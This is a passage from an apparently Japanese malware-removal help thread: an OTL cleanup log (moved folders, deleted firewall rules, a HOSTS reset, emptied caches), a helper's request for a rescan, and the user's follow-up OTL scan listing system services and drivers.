c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Maps folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Logs\Mail folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Logs folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Load\Textures folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Load folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\GC folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\GameConfig folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Dump\Textures folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Dump\DSP folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Dump folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Config folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User\Cache folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\User folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Sys\Wii folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Sys\GC folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Sys folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\zh_TW folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\zh_CN folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\sr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ru folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\pt_BR folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\pt folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\pl folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\nl folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\nb folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ko folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ja folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\it folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\hu folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\he folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\fr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\es folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\en folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\el folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\de folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\cs folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages\ar folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64\Languages folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\Dolphin-3.5-x64 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\save folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\graffiti folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\savedata folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr\plugin folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr\sinyujk_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0\apt021_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\breed_trial_1_2_0 folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\apt003_tr\oretsun_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample\apt003_tr folder moved successfully.
c:\users\ryota\desktop\xxxx\babel19sample folder moved successfully.
c:\users\ryota\desktop\xxxx\kontrapunkt_trial\KONTRAPUNKT.exe moved successfully.
c:\users\ryota\desktop\実況\chorokuf\jword_plugin.exe moved successfully.
c:\programdata\application data\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\Custom.dll moved successfully.
File\Folder c:\programdata\application data\{021e6b93-a7a5-9558-021e-e6b93a7aae4e} not found.
File\Folder c:\programdata\installmate\{6e368556-5bdf-4df8-af13-13fdb5d5a7a0}\custom.dll not found.
c:\programdata\{021e6b93-a7a5-9558-021e-e6b93a7aae4e} folder moved successfully.
c:\users\ryota\appdata\local\COMODO\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0 folder moved successfully.
c:\users\ryota\appdata\local\COMODO\dragon\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7 folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127 folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1 folder moved successfully.
c:\users\ryota\appdata\local\comodo\dragon\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg\1.0 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\eekmagkgglabkmaoecjndeboolfapocg folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim\2.7 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\lfnkbkehickiiakkkdkhfaifpdkaobim folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff\127 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\mihcahmgecmbnbcchbopgniflfhgnkff folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa\1.1 folder moved successfully.
c:\users\ryota\appdata\local\google\chrome sxs\user data\default\extensions\pjcajdjkhacidelppkfpjobgdjkafjaa folder moved successfully.
File\Folder c:\downloads not found.
c:\program files (x86)\DAEMON Tools Lite\Lang folder moved successfully.
c:\program files (x86)\DAEMON Tools Lite folder moved successfully.
c:\program files (x86)\SegmentAmplifier folder moved successfully.
File\Folder c:\users\ryota\downloads\utorrent.exe not found.
File\Folder c:\windows\system32\dmwu.exe not found.
========== REGISTRY ==========
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0BB8AC33-4C3D-426C-8439-A58A243DDC61} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0BB8AC33-4C3D-426C-8439-A58A243DDC61}\ not found.
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E0D4F4A4-50DB-4E61-A9A6-97D2145A436B}\ not found.
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6A917C9-2D7C-44DA-ADC3-F27BAC54466A}\ not found.
Registry value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6} deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{E6B916CF-2E4B-4E04-A2D0-24AF907AFED6}\ not found.
========== COMMANDS ==========
C:\WINDOWS\System32\drivers\etc\Hosts moved successfully.
HOSTS file reset successfully

[EMPTYFLASH]

User: Administrator

User: All Users

User: Default
->Flash cache emptied: 57616 bytes

User: Default User
->Flash cache emptied: 0 bytes

User: Default.migrated

User: Guest

User: Public

User: ryota
->Flash cache emptied: 297486 bytes

Total Flash Files Cleaned = 0.00 mb


[EMPTYJAVA]

User: Administrator

User: All Users

User: Default

User: Default User

User: Default.migrated

User: Guest

User: Public

User: ryota

Total Java Files Cleaned = 0.00 mb


[EMPTYTEMP]

User: Administrator

User: All Users

User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes

User: Default.migrated

User: Guest

User: Public

User: ryota
->Temp folder emptied: 61076371 bytes
->Temporary Internet Files folder emptied: 12986588 bytes
->FireFox cache emptied: 1149858 bytes
->Google Chrome cache emptied: 311812804 bytes
->Flash cache emptied: 0 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 3238240 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1518840 bytes
RecycleBin emptied: 6025858 bytes

Total Files Cleaned = 379.00 mb

Unable to start System Restore Service. Error code 1084

OTL by OldTimer - Version 3.2.69.0 log created on 04212015_221846

Files\Folders moved on Reboot...
C:\Users\ryota\AppData\Local\Microsoft\Windows\INetCache\counters.dat moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

OTLでの処置そのものは正常に完了しているようです。
しかし依然として異常が続くと言うことですので、お手数ですが今一度OTLでスキャンをお願いします。
今回はExtras.txtは出力されない可能性がありますが、なければないで結構です。

お待たせしました。以下にＯＴＬのログを貼っておきます。
Extras.txtは出力されなかったです。


OTL logfile created on: 2015/04/22 23:55:38 - Run 3
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 7.11 Gb Available Physical Memory | 90.27% Memory free
9.13 Gb Paging File | 8.43 Gb Available in Paging File | 92.27% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.00 Gb Free Space | 7.66% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Processes (SafeList) ==========[/color]

PRC - [2015/04/20 21:57:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ryota\Desktop\OTL.exe


[color=#E56717]========== Modules (No Company Name) ==========[/color]


[color=#E56717]========== Services (SafeList) ==========[/color]

SRV:[b]64bit:[/b] - [2015/02/21 08:49:18 | 000,780,800 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\lsm.dll -- (LSM)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,366,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\NisSrv.exe -- (WdNisSvc)
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
SRV:[b]64bit:[/b] - [2014/10/31 13:51:25 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:[b]64bit:[/b] - [2014/10/29 12:59:51 | 003,460,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\WSService.dll -- (WSService)
SRV:[b]64bit:[/b] - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:19 | 000,026,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wephostsvc.dll -- (WEPHOSTSVC)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:03 | 000,041,472 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\efssvc.dll -- (EFS)
SRV:[b]64bit:[/b] - [2014/10/29 11:34:51 | 000,067,584 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wiarpc.dll -- (WiaRpc)
SRV:[b]64bit:[/b] - [2014/10/29 11:33:55 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\svsvc.dll -- (svsvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:29:22 | 000,121,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\fhsvc.dll -- (fhsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:57:05 | 000,324,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\BthHFSrv.dll -- (BthHFSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:48:20 | 000,166,400 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcaSvc.dll -- (NcaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicvss)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmictimesync)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicshutdown)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicrdv)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmickvpexchange)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicheartbeat)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:27 | 000,524,800 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\icsvc.dll -- (vmicguestinterface)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:21 | 000,013,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\smphost.dll -- (smphost)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:21 | 000,838,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netlogon.dll -- (Netlogon)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:02 | 000,294,912 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\SystemEventsBrokerServer.dll -- (SystemEventsBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:37 | 000,131,072 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ScDeviceEnum.dll -- (ScDeviceEnum)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:20:03 | 000,262,656 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\TimeBrokerServer.dll -- (TimeBroker)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:17 | 000,154,112 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\ncbservice.dll -- (NcbService)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:24 | 000,374,784 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wcmsvc.dll -- (Wcmsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:13:02 | 000,260,608 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\vaultsvc.dll -- (VaultSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:36 | 000,407,040 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\das.dll -- (DeviceAssociationService)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:22 | 000,270,336 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\bisrv.dll -- (BrokerInfrastructure)
SRV:[b]64bit:[/b] - [2014/10/29 10:11:10 | 001,639,424 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlidsvc.dll -- (wlidsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:09:48 | 000,521,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\GeofenceMonitorService.dll -- (lfsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:05:09 | 000,206,848 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\DeviceSetupManager.dll -- (DsmSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:57:18 | 000,074,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\NcdAutoSetup.dll -- (NcdAutoSetup)
SRV:[b]64bit:[/b] - [2014/10/29 09:48:52 | 000,562,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppReadiness.dll -- (AppReadiness)
SRV:[b]64bit:[/b] - [2014/10/29 09:46:48 | 001,348,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\AppXDeploymentServer.dll -- (AppXSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:35:51 | 001,668,096 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\workfolderssvc.dll -- (workfolderssvc)
SRV:[b]64bit:[/b] - [2014/10/01 19:54:24 | 000,319,376 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Windows\SysNative\igfxCUIService.exe -- (igfxCUIService1.0.0.0)
SRV:[b]64bit:[/b] - [2012/08/14 18:03:42 | 000,027,792 | ---- | M] (VIA Technologies, Inc.) [Auto | Stopped] -- C:\Windows\SysNative\ViakaraokeSrv.exe -- (VIAKaraokeService)
SRV:[b]64bit:[/b] - [2012/06/19 19:10:34 | 000,634,632 | ---- | M] (Intel(R) Corporation) [Auto | Stopped] -- C:\Program Files\Intel\iCLS Client\HeciServer.exe -- (Intel(R)
SRV - [2015/04/15 01:48:07 | 000,268,464 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2015/04/03 14:37:50 | 000,148,080 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2015/02/18 19:11:32 | 000,315,488 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 15:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Stopped] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/10/29 12:50:11 | 002,987,520 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\system32\spool\drivers\x64\3\PrintConfig.dll -- (PrintNotify)
SRV - [2014/10/29 10:51:55 | 000,017,920 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\StorSvc.dll -- (StorSvc)
SRV - [2014/10/29 10:04:45 | 000,011,776 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\smphost.dll -- (smphost)
SRV - [2014/10/29 09:53:11 | 000,367,104 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\GeofenceMonitorService.dll -- (lfsvc)
SRV - [2014/10/01 19:54:28 | 000,281,488 | ---- | M] (Intel Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\IntelCpHeciSvc.exe -- (cphs)
SRV - [2014/08/14 07:30:50 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/07/14 18:21:46 | 001,390,176 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe -- (c2cautoupdatesvc)
SRV - [2014/07/14 18:21:06 | 001,767,520 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe -- (c2cpnrsvc)
SRV - [2014/03/04 10:10:14 | 000,122,464 | ---- | M] (株式会社ネットビジョン) [On_Demand | Stopped] -- C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe -- (auWifiConnectSvc)
SRV - [2013/12/18 01:56:16 | 000,754,712 | ---- | M] (Google Inc.) [Auto | Stopped] -- C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe -- (GoogleIMEJaCacheService)
SRV - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe -- (MBAMService)
SRV - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe -- (MBAMScheduler)
SRV - [2012/09/17 17:19:50 | 000,364,416 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe -- (UNS)
SRV - [2012/09/17 17:19:48 | 000,276,864 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe -- (LMS)
SRV - [2012/09/17 17:19:34 | 000,165,760 | ---- | M] (Intel Corporation) [Auto | Stopped] -- C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe -- (jhi_service)
SRV - [2007/09/05 14:38:28 | 000,174,624 | ---- | M] () [Auto | Stopped] -- C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe -- (TangoCoreService)


[color=#E56717]========== Driver Services (SafeList) ==========[/color]

DRV:[b]64bit:[/b] - [2015/03/04 19:25:11 | 000,377,152 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\clfs.sys -- (CLFS)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,264,000 | ---- | M] (Microsoft Corporation) [File_System | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdFilter.sys -- (WdFilter)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:33 | 000,114,496 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\WdNisDrv.sys -- (WdNisDrv)
DRV:[b]64bit:[/b] - [2015/02/04 08:58:04 | 000,044,024 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Stopped] -- C:\Windows\SysNative\drivers\WdBoot.sys -- (WdBoot)
DRV:[b]64bit:[/b] - [2014/12/12 09:51:20 | 000,075,776 | ---- | M] (Microsoft Corporation) [Kernel | System | Stopped] -- C:\Windows\SysNative\drivers\ahcache.sys -- (ahcache)
DRV:[b]64bit:[/b] - [2014/11/13 21:35:31 | 000,283,064 | ---- | M] (Disc Soft Ltd) [Kernel | System | Running] -- C:\Windows\SysNative\drivers\dtsoftbus01.sys -- (dtsoftbus01)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:47 | 000,415,040 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\spaceport.sys -- (spaceport)
DRV:[b]64bit:[/b] - [2014/10/29 12:59:12 | 000,136,512 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\wfplwfs.sys -- (WFPLWFS)
DRV:[b]64bit:[/b] - [2014/10/29 12:57:42 | 000,054,784 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\wpcfltr.sys -- (wpcfltr)
DRV:[b]64bit:[/b] - [2014/10/29 12:56:04 | 000,027,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:43 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbGD.sys -- (TsUsbGD)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:41 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bthhfenum.sys -- (BthHFEnum)
DRV:[b]64bit:[/b] - [2014/10/29 11:46:09 | 000,087,040 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netvsc63.sys -- (netvsc)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:54 | 000,126,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\NdisImPlatform.sys -- (NdisImPlatform)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:39 | 000,066,560 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mslldp.sys -- (MsLldp)
DRV:[b]64bit:[/b] - [2014/10/29 11:45:16 | 000,103,424 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Stopped] -- C:\Windows\SysNative\drivers\Ndu.sys -- (Ndu)
DRV:[b]64bit:[/b] - [2014/10/15 17:32:36 | 000,921,920 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\WINDOWS\SysNative\drivers\refs.sys -- (ReFS)
DRV:[b]64bit:[/b] - [2014/10/13 11:43:17 | 000,238,912 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\sdbus.sys -- (sdbus)
